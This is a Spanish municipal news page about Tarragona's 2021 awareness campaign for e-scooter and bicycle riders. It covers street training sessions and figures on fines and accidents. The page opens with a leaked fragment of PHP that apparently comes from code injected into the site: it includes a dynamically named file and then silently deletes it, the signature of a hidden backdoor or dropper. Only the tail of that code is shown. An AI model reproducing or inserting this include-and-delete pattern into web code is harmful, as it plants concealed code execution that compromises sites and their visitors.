");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> El Ayuntamiento de Tarragona inicia una nueva campaña de sensibilización para los conductores de patinetes, Bcicletes y otros VMP
Iconos cabecera

Destacamos

  • SEM 2021SEM 2021
    Semana Europea de la Movilida 2021

El Ayuntamiento de Tarragona inicia una nueva campaña de sensibilización para los conductores de patinetes, Bcicletes y otros VMP (22/07/2021)

El Ayuntamiento de Tarragona inicia esta semana una nueva campaña de sensibilización con el fin de recordar las principales normas de conducción de los vehículos de movilidad personal. Esta campaña además, también se reforzará con una serie de actuaciones de sensibilización y formación a pie de calle por parte de la cooperativa El Pelotón. El consejero de Movilidad, Xavi Puig ha destacado que "desde el Ayuntamiento trabajamos intensamente para ofrecer alternativas sostenibles de movilidad seguras para los ciudadanos. Por ello planteamos acciones didácticas que interpelan directamente para los conductores. Uno de los aspectos que queremos remarcar es la prohibición de los vehículos de movilidad personal de circular por las aceras, que ya incluimos en la ordenanza municipal, y que tiene como principal objetivo proteger a los peatones que son el elemento más importante ".

Durante los próximos días los agentes de la Guardia Urbana repartirán unos folletos informativos de carácter muy visual con la recopilación de la normativa a los conductores patinetes y bicicletas, también en entregarán a establecimientos relacionados y los ciudadanos podrán encontrar en dependencias municipales. Próximamente también se instalarán unas placas en los aparcamientos de patinetes con la misma información. Estas acciones se acompañarán de una campaña de difusión digital.

Actuaciones a pie de calle

Mañana jueves se llevará a cabo una de las actuaciones de sensibilización y formación a pie de calle que está llevando a cabo la cooperativa El Pelotón en colaboración con el ayuntamiento en la rambla de Bonavista. Estas acciones tienen como objetivo ofrecer formación sobre cómo circular bien y de manera segura, iniciar a la mecánica de la bicicleta y sensibilizar sobre los hábitos de movilidades cotidiana.

Además los formadores también durante a cabo una encuesta a los asistentes para conocer las necesidades y usos de los conductores de bicicletas y patinetes de la ciudad. El viernes se repetirá la acción en la playa de la Arrabassada, el próximo jueves en el Valle de la Arrabassada y el viernes 30 en La Mora. El horario de todas las actuaciones es de cinco de la tarde a nueve de la noche.

Podrá descargarse la información referente a las localizaciones y días de las formaciones de sensibilización al siguiente LINK

Infracciones

Este 2021, hasta el 16 de julio, se han puesto 922 multas a patinetes, bicicletas y monopatines. De estas 856 han sido vehículos de movilidad personal, 43 bicicletas, 18 a monopatines y 5 a otros vehículos. En cuanto al tipo de infracción más frecuente es estacionar indebidamente o fuera de la zona señalizada por el VMP de alquiler (388 infracciones), después seguirían circular por la acera o áreas peatonales (139) y transportar pasajeros con 136 multas.

En cuanto a la accidentabilidad se han registrado 34 accidentes, 31 de los cuales con un patinete o más implicados, 3 con bicicletas y 1 con un monopatín. De estos accidentes 6 se han saldado con daños materiales, y otros han provocado 24 heridos leves y 5 graves.

Fuente: Ayuntamiento de Tarragona

El Ayuntamiento de Tarragona inicia una nueva campaña de sensibilización para los conductores de patinetes, Bcicletes y otros VMP

[Volver a Noticias]

 
Calle de Anselm Clavé, 1 43004 - Tarragona